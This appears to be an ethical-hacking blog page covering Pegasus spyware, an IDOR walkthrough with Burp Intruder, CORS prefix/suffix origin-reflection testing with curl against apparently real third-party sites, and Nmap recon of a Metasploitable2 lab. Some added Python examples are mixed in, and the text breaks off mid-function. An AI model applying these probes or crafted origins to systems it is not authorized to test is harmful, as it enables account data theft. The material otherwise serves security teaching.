
ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are in every major security system, you just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like mindset and goals.



PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • Pegasus Spyware

    Pegasus Spyware

    What is Pegasus Spyware?

    Pegasus is spyware developed by the Israeli cyber-arms firm NSO Group that can be covertly installed on mobile phones running most versions of iOS and Android.

    NSO Group was previously owned by the American private equity firm Francisco Partners, but was bought back by its founders in 2019. The company states that it provides authorized governments with technology that helps them combat terror and crime.

    Zero-click installation, which requires no action by the target, is not the only ability that makes Pegasus the super-spyware it is. What also makes it unique is the capability of "active collection", which gives attackers the power to "control the information" they want to collect from the targeted device.

    The spyware can steal private data from a phone, sending a target's messages, passwords, contacts, photos, location and more to whoever initiated the surveillance. It can reportedly even turn on the phone's cameras or microphones to create covert recordings.

    The transmitted data is encrypted with 128-bit AES symmetric encryption. Beyond the encryption, extra care is taken to ensure that Pegasus uses minimal data, battery and memory, so that the target does not get suspicious.

    Data transmission stops automatically when the battery level is low or when the target is roaming. When transmission is not possible, Pegasus stores the collected data in a hidden, encrypted buffer. Under rare circumstances, when no transmission is possible through safe channels, an attacker can collect urgent data through text messages.

    Pegasus comes complete with an efficient self-destruct mechanism. Any risk of exposure automatically activates it, and it also triggers if Pegasus on an infected device has not communicated with its server for 60 days, or for a customized period of time.

    The company does not allow infected phones to travel to the United States: the moment a victim enters the US, Pegasus on her device goes into self-destruct mode.

    Pegasus was discovered in August 2016 after a failed installation attempt on the iPhone of the Arab human rights activist Ahmed Mansoor led to an investigation revealing details about the spyware, its abilities and the security vulnerabilities it exploited. News of the spyware caused significant media coverage. It was called the "most sophisticated" smartphone attack ever.


    On August 23, 2020, according to intelligence obtained by the Israeli newspaper Haaretz, NSO Group sold Pegasus spyware for hundreds of millions of US dollars to the United Arab Emirates and the other Gulf states, for surveillance of anti-regime activists, journalists and political leaders from rival nations, with encouragement and mediation by the Israeli government.

    Later, in December 2020, the Al Jazeera investigative show The Tip of the Iceberg, Spy Partners, exclusively covered Pegasus and its penetration into the phones of media professionals and activists, and its use by Israel to eavesdrop on both opponents and allies.

    In July 2021, widespread media coverage as part of the Project Pegasus revelations, along with an in-depth analysis by the human rights group Amnesty International, uncovered that Pegasus was still being widely used against high-profile targets. It showed that Pegasus was able to infect all modern iOS versions up to the latest release at the time, iOS 14.6, through a zero-click iMessage exploit.

    In late 2019, Facebook initiated a suit against NSO, claiming that Pegasus had been used to intercept the WhatsApp communications of a number of activists, journalists and bureaucrats in India, leading to accusations that the Indian government was involved.

    Phone numbers of Indian ministers, opposition leaders, ex-election commissioners and journalists were allegedly found on a database of NSO hacking targets by Project Pegasus in 2021. Eleven phone numbers associated with a female employee of the Supreme Court of India and her immediate family, who had accused the former Chief Justice of India, Ranjan Gogoi, of sexual harassment, were also allegedly found on the database, indicating the possibility that their phones were snooped on.

    It was reported that the Indian government used Pegasus to spy on Pakistan's Prime Minister Imran Khan and on diplomats from Iran, Afghanistan, China, Nepal and Saudi Arabia.

    Pegasus has been used to target and intimidate Mexican journalists by drug cartels and cartel-entwined government actors. Pegasus software, whose sales are licensed by the government of Israel to foreign governments, helped Saudi Arabia spy on Jamal Khashoggi, who was later killed in Turkey. Pegasus was also used to spy on Jeff Bezos after Mohammed bin Salman, the crown prince of Saudi Arabia, exchanged messages with him that exploited then-unknown vulnerabilities in WhatsApp.

    A leak of a list of over 50,000 phone numbers, believed to have been identified as those of people of interest by clients of NSO since 2016, became available to the Paris-based media nonprofit Forbidden Stories and to Amnesty International.

    Disclaimer

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • Testing for Insecure Direct Object References

    Insecure Direct Object References

    Insecure Direct Object References (IDOR) occur when an application takes user-supplied input and uses it directly to look up an object, for example a database record or a file, without performing sufficient authorization checks on that object. An attacker can then bypass authorization simply by modifying the value of the parameter that points to the object, and gain access to resources such as database entries belonging to other users, files on the system, and more.

     


    How to Test

    • Map out every location in the application where user-supplied input is used to reference an object directly.
    • The best way to test for direct object references is to have at least two user accounts, so that each owns different objects and functions and you can try to reach one user's objects from the other user's session.
    • Pay particular attention to any parameter whose value is used directly to:
    • retrieve a database record;
    • perform an operation in the system;
    • retrieve a file system resource;
    • access application functionality.


    The target below is a deliberately vulnerable web page on which you can discover an IDOR vulnerability and pick up some new techniques.

    CAUTION: This is an intentionally broken web application. Please do NOT use any real information.






    In the URL shown above, a number selects which profile is displayed; that number is the direct object reference we are going to manipulate.







    Let's intercept the request in Burp Suite and send it to the Intruder tab.






    The number we have chosen as the object needs to be marked as a payload position, so highlight the number and click the Add button.











    Now change the payload type to Numbers in the Payload set, so that the marked position is replaced with a numeric range (1 to 100, or whatever range you need).

    In Payload Options [Numbers], set the range from 1 to 1000 and leave the other options as they are.

    Finally, click Start attack.






    As you can see, the responses come back with status 200, which means OK. A 200 on its own does not prove an IDOR, though: sort the results by response length and compare the bodies, because an application that answers every id with a 200 and a generic error page will also show 200 everywhere.








    After changing the object value we can see that the profile changes, which means we are able to view other users' profiles without ever being authorized for them.
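    As an added example, not code from the original post, the same flaw in miniature: a profile lookup that uses the id straight from the request, the hardened version that checks ownership, and the two-account id sweep the checklist above describes. The users, ids and records are constructed for the example and the endpoint names are hypothetical.

```python
# Added example, not code from the original post: a minimal profile endpoint
# with an IDOR, its hardened version, and the two-account sweep that the
# checklist above describes. The users, ids and records are constructed
# for the example; the endpoint names are hypothetical.
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional

# Constructed sample data: profile id -> owner plus private fields.
PROFILES = {
    101: {"owner": "alice", "email": "alice@example.test", "phone": "555-0101"},
    102: {"owner": "bob", "email": "bob@example.test", "phone": "555-0102"},
    103: {"owner": "carol", "email": "carol@example.test", "phone": "555-0103"},
}


@dataclass
class Response:
    status: int
    body: Optional[dict] = None


def get_profile_vulnerable(session_user: Optional[str], profile_id: int) -> Response:
    """IDOR: the id taken from the URL is used directly as the lookup key and
    the caller's identity is never compared with the record's owner."""
    record = PROFILES.get(profile_id)
    if record is None:
        return Response(404)
    return Response(200, record)


def get_profile_secure(session_user: Optional[str], profile_id: int) -> Response:
    """Fix: require an authenticated session and check ownership on every
    object access. Answering 404 instead of 403 for foreign ids also avoids
    confirming to an enumerating attacker which ids exist."""
    if session_user is None:
        return Response(401)
    record = PROFILES.get(profile_id)
    if record is None or record["owner"] != session_user:
        return Response(404)
    return Response(200, record)


def find_idor(handler: Callable[[Optional[str], int], Response],
              session_user: Optional[str], ids: Iterable[int]) -> List[int]:
    """Sweep ids the way the Intruder Numbers payload does, but judge on the
    returned content, not on the status code alone: an id is an IDOR hit only
    if the request succeeds AND the record belongs to someone other than the
    session user."""
    hits = []
    for pid in ids:
        resp = handler(session_user, pid)
        if resp.status == 200 and resp.body["owner"] != session_user:
            hits.append(pid)
    return hits


if __name__ == "__main__":
    # Logged in as alice (owner of 101), sweep 1..1000 as in the walkthrough.
    print("vulnerable:", find_idor(get_profile_vulnerable, "alice", range(1, 1001)))
    print("hardened:  ", find_idor(get_profile_secure, "alice", range(1, 1001)))
    print("anonymous: ", find_idor(get_profile_vulnerable, None, range(1, 1001)))
```

    The sweep reports 102 and 103 against the vulnerable handler and nothing against the hardened one. Note that the hardened handler decides on the record's owner, not on whether the caller is logged in: being authenticated is not the same as being authorized for a given object, which is exactly the distinction IDOR exploits.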









      - Hacking Truth by Kumar Atul Jaiswal



  • Exploitation of CORS Prefix-Suffix Match

    Exploitation of CORS Prefix-Suffix Match

    In this post we are going to look at exploiting CORS misconfigurations through prefix matching and suffix matching of the Origin header.

    What is CORS?

    Cross-Origin Resource Sharing (CORS), originally specified by the W3C and now defined as part of the WHATWG Fetch standard, defines how a browser and a server must communicate when a page requests resources from a different origin. It is a controlled relaxation of the browser's Same-Origin Policy.

    It is implemented via HTTP headers (Access-Control-Allow-Origin, Access-Control-Allow-Credentials and related headers) that servers set and browsers enforce.



    Prefix match

    The target URL is on hakonindia.org, and here we append evil.com to the end of the trusted hostname. This is known as prefix-match exploitation of CORS, because the trusted name is only a prefix of the origin the server ends up accepting.

    While testing, I noticed that the server rejects any arbitrary Origin that does not start with "hakonindia": sending Origin: attacker.com is not accepted, and neither is "evilhakonindia.org", because the developer has added a condition that the origin must begin with the site's own hostname. Nothing can be prepended to the hostname. But when I appended attacker.com or evil.com after the hostname, the origin was accepted and reflected into the response as-is. This means an attacker can register evil.com, create a subdomain of it (and a subdomain of that), and successfully exploit CORS on this website.

     



    Here the attacker registers the domain evil.com and creates a subdomain such as org.evil.com or hakonindia.org.evil.com.


    {
      "url":"http://www.hackonindia.org/wp-json",
      "credentials":"true",
      "type":"prefix_match",
      "origin":"http://www.hackonindia.org.evil.com",
      "status_code":200
    }
    
    





    Here we use curl against the target "http://www.hakonindia.org/wp-json" with -I, because we only want to see the response headers.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I 
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Link: ; rel="https://api.w.org/"
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
      




    As you can see, we get the response headers back. Now we add our crafted origin, hakonindia.org.evil.com, to the request.

    -H adds a request header; the header we send is Origin with the value hakonindia.org.evil.com. When we hit enter, the origin we supplied is reflected into the response as-is: Access-Control-Allow-Origin is hakonindia.org.evil.com (the server even prepends http:// for us) and Access-Control-Allow-Credentials is true. That combination is the best case an attacker can hope for, because a page on that origin can make requests carrying the victim's cookies and read the responses. We are able to exploit this.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I -H Origin:hakonindia.org.evil.com
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Access-Control-Allow-Origin: http://hakonindia.org.evil.com
    Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    Access-Control-Allow-Credentials: true
    Vary: Origin, User-Agent
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
      
      



     

    Suffix match

    For the suffix-match type, the target URL is "https://ukrainianpeople.us/wp-json".

    Look closely at the origin I supply this time: "evilukrainianpeople.us". Some websites block arbitrary attacker origins such as evil.com by checking that any Origin sent to the server contains the site's own hostname, here "ukrainianpeople". But that check does not notice when the attacker adds something in front of the hostname. When we send evilukrainianpeople.us, the website trusts it, because the condition only checks that ukrainianpeople.us appears in the origin, which is satisfied, and the origin is reflected into the response. The attacker can then register the domain evilukrainianpeople.us and carry out the CORS exploitation from it.




      
      
    {
      "url":"https://ukrainianpeople.us/wp-json",
      "credentials":"true",
      "type":"suffix_match",
      "origin":"https://evilukrainianpeople.us",
      "status_code":200
    }

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:19:56 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:19:56 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
    
    
      




    We start with curl against our target "https://ukrainianpeople.us/wp-json" with -I, since we only want the response headers. The headers shown above are what the web server returns without any Origin. Now we add our crafted origin and try to make the website trust us: -H adds a header, the header name is Origin and the value is evilukrainianpeople.us.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I -H Origin:evilukrainianpeople.us        
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:20:54 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,Origin,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    access-control-allow-origin: http://evilukrainianpeople.us
    access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    access-control-allow-credentials: true
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:20:54 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
      




    As you can see, access-control-allow-origin reflects our origin and access-control-allow-credentials is also true.






    Brought to you by Hacking Truth


     

     

    CORS Mitigation

    1) Rely on the Same-Origin Policy (SOP) by default.
    2) Do not trust arbitrary origins, and do not communicate with them.

    What are the mitigations for CORS?

    1) The first and best mitigation is the Same-Origin Policy itself. SOP is the browser's default: a page may only read responses from its own origin (scheme, host and port). CORS headers are how a server opts out of that isolation, so unless a cross-origin consumer genuinely needs to read your responses, simply do not emit Access-Control-Allow-Origin at all and the browser keeps other sites out.

    2) Do not trust arbitrary origins. If a web application receives a request with an Origin header, it must not trust that header blindly and hand out sensitive information: when an attacker attempts reflected-origin CORS, the server should discard the origin and not grant it access. Likewise, when a prefix- or suffix-based attack is attempted, the server must do proper validation rather than merely checking that its own hostname appears somewhere in the Origin. We have already seen what happens when a misconfigured server takes decisions on that basis: hakonindia.org.evil.com and evilukrainianpeople.us both pass, and both are domains an attacker can register. Validate the Origin against an explicit allowlist of complete origins (scheme, host and port) with an exact comparison, never send Access-Control-Allow-Credentials: true alongside a dynamically reflected origin, and do not accept the literal origin "null". Not trusting arbitrary origins is the best mitigation for CORS, and I hope the mitigations are now clear.
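    As an added example, not code from the original post or from either target site, the three kinds of Origin check discussed above written out: the "starts with" check that the prefix-match attack slips past, the "ends with" check that the suffix-match attack slips past, and the exact-match allowlist check that stops both. The validator names, cors_response_headers and candidate_origins are hypothetical; only the hostnames come from the post.

```python
# Added example, not code from the original post: three Origin validators a
# WordPress-style endpoint might use, run against the origins from the two
# walkthroughs above, plus a helper that shows which CORS headers each one
# would emit. The validator names and cors_response_headers are hypothetical;
# only the hostnames come from the post.
from typing import Callable, Dict, List, Optional
from urllib.parse import urlsplit

Validator = Callable[[str, str], bool]


def _host_part(origin: str) -> str:
    """Strip the scheme so the naive checks below compare hostnames the way a
    developer's quick 'does it contain our site' test usually does."""
    return origin.split("://", 1)[-1]


def starts_with_check(origin: str, trusted_host: str) -> bool:
    """Weak (prefix-match case): rejects evilhakonindia.org but happily
    accepts www.hakonindia.org.evil.com, which the attacker can register."""
    return _host_part(origin).startswith(trusted_host)


def ends_with_check(origin: str, trusted_host: str) -> bool:
    """Weak (suffix-match case): rejects evil.com but accepts
    evilukrainianpeople.us, which the attacker can register."""
    return _host_part(origin).endswith(trusted_host)


def strict_check(origin: str, trusted_host: str, scheme: str = "https") -> bool:
    """Fix: parse the Origin and require an exact match on scheme and host
    (netloc, so an unexpected :port is rejected too). The literal 'null'
    and http:// origins fail here as well."""
    parts = urlsplit(origin)
    return parts.scheme == scheme and parts.netloc == trusted_host and parts.path == ""


def cors_response_headers(origin: Optional[str], trusted_host: str,
                          validator: Validator) -> Dict[str, str]:
    """Headers the server would add for a given Origin. No Origin, or a
    rejected one, means no CORS headers at all, and the browser then enforces
    the Same-Origin Policy. Echoing an allowlisted origin back is fine and is
    how several origins are supported; the danger lies in the validator."""
    if origin is None or not validator(origin, trusted_host):
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",  # stop caches serving one origin's answer to another
    }


def candidate_origins(trusted_host: str, attacker_domain: str = "evil.com") -> List[str]:
    """Origins worth sending with curl -H 'Origin: ...' when testing a site:
    prefix, suffix, reflection, scheme-downgrade and null variants."""
    return [
        f"http://{trusted_host}.{attacker_domain}",   # prefix match
        f"https://evil{trusted_host}",                # suffix match
        f"https://{attacker_domain}",                 # arbitrary reflection
        f"http://{trusted_host}",                     # https -> http downgrade
        "null",                                       # sandboxed iframe / file origin
    ]


if __name__ == "__main__":
    for host, origin, weak in [
        ("www.hakonindia.org", "http://www.hakonindia.org.evil.com", starts_with_check),
        ("ukrainianpeople.us", "https://evilukrainianpeople.us", ends_with_check),
    ]:
        print(origin, "weak   ->", cors_response_headers(origin, host, weak))
        print(origin, "strict ->", cors_response_headers(origin, host, strict_check))
```

    Run it and both crafted origins come back with Access-Control-Allow-Origin and Access-Control-Allow-Credentials: true from the weak validators, and with no CORS headers at all from strict_check. The list from candidate_origins is the set of Origin values to feed into the curl -I -H "Origin: ..." probe shown above when testing a new target.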







      - Hacking Truth by Kumar Atul Jaiswal


  • Vulnerability Assessment & Penetration Testing Report Metasploitable2


    Vulnerability Assessment & Penetration Testing Report on Metasploitable2


    VAPT, Vulnerability Assessment and Penetration Testing, begins with the vulnerability assessment: the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructure, and providing the organization doing the assessment with the knowledge, awareness and risk background it needs to understand the threats to its environment and react appropriately.

    Penetration testing (or pentesting) is a simulated cyber attack in which professional ethical hackers break into corporate networks to find weaknesses before real attackers do. It is like the movie Sneakers, where hacker-consultants break into your corporate network for exactly that purpose: the pentester uses the same tools and techniques that are available to malicious hackers.



    Life Cycle of Penetration Testing:

    1] Reconnaissance

    2] Scanning

    3] Exploitation

    4] Maintaining Access



    Reconnaissance


    First comes reconnaissance, the information-gathering work done before any real attack is planned. Recon is usually the longest phase, sometimes taking weeks or months. Here, however, we have a known target, a Metasploitable2 machine connected to the same network as us, so to find it we run an Nmap scan:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    The IP range in the command above covers every system connected to the network, because we want the OS and service details of each host in order to find our target machine. (-sP is the deprecated spelling of -sn, Nmap's host-discovery-only mode.) First we separate out the live IP addresses: the scan result is saved in livehosts.txt and the addresses are then filtered out of it with the command below.

    cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt

    This keeps the "Nmap scan report for <address>" lines and takes the fifth space-separated field, the address. Note that it only works when Nmap prints a bare IP address: if reverse DNS resolves a name, the line reads "Nmap scan report for <name> (<address>)" and field 5 becomes the hostname, so add -n to the scan (or use -oG grepable output) for a robust pipeline. The filtered addresses are saved in a new file, and the result is shown below.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat ip.txt                                              
    192.168.43.1
    192.168.43.120
    192.168.43.152
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    


    Now we have to check which of these is the Metasploitable2 machine, so we run a service and OS detection scan against all the live IPs:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Our output is here :-)



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat osdetails.txt                                       
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
    Nmap scan report for 192.168.43.1
    Host is up (0.0026s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  dnsmasq 2.51
    MAC Address: 2A:09:08:63:43:8D (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
    OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
    OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
    OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
    OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
    OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
    OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
    OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
    OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
    OS:%T=40%CD=S)
    
    Network Distance: 1 hop
    
    Nmap scan report for 192.168.43.120
    Host is up (0.00071s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec?
    513/tcp  open  login
    514/tcp  open  shell?
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
    SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
    SF:ulJaiswal\)\n");
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 192.168.43.152
    Host is up (0.000089s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6.32
    OS details: Linux 2.6.32
    Network Distance: 0 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    
    
    


    As you can see, a lot of information is retrieved: ports, services, versions, the TCP/IP fingerprint, hostnames, OS details, MAC addresses, network distance and so on. The host at 192.168.43.120 is clearly our target: its Service Info names metasploitable.localdomain, it sits on a VirtualBox virtual NIC, and port 1524 even advertises a Metasploitable root shell.
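    As an added example, not part of the original report, here is a small parser for Nmap's normal output that does the job of the grep | cut pipeline above without tripping over reverse-DNS names, and then picks the Metasploitable2 host out of the parsed results by the same clues just mentioned. SAMPLE is a constructed, abridged copy of the osdetails.txt output above, with the second host deliberately written in the "name (ip)" form; the function names are hypothetical.

```python
# Added example, not code from the original post: a parser for Nmap's normal
# (-oN / stdout) output that replaces the grep|cut pipeline above with
# something robust to reverse-DNS names, and then picks the Metasploitable2
# host out of the parsed results. SAMPLE is a constructed, abridged copy of
# the osdetails.txt output shown above; the second host is deliberately
# given the "name (ip)" form that Nmap prints when reverse DNS resolves.
import re
from typing import Dict, List, Optional

SAMPLE = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
53/tcp open  domain  dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Nmap scan report for metasploitable.localdomain (192.168.43.120)
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
1524/tcp open  bindshell   Metasploitable root shell
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
OS details: Linux 2.6.9 - 2.6.33
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
OS details: Linux 2.6.32
"""

# "Nmap scan report for 10.0.0.5"  or  "Nmap scan report for name (10.0.0.5)"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d{1,3}(?:\.\d{1,3}){3})\))?$")
# "21/tcp   open  ftp         vsftpd 2.3.4"   (version may be empty)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_report(text: str) -> Dict[str, dict]:
    """Return {ip: {ip, hostname, ports, mac, os, service_info}} in scan order."""
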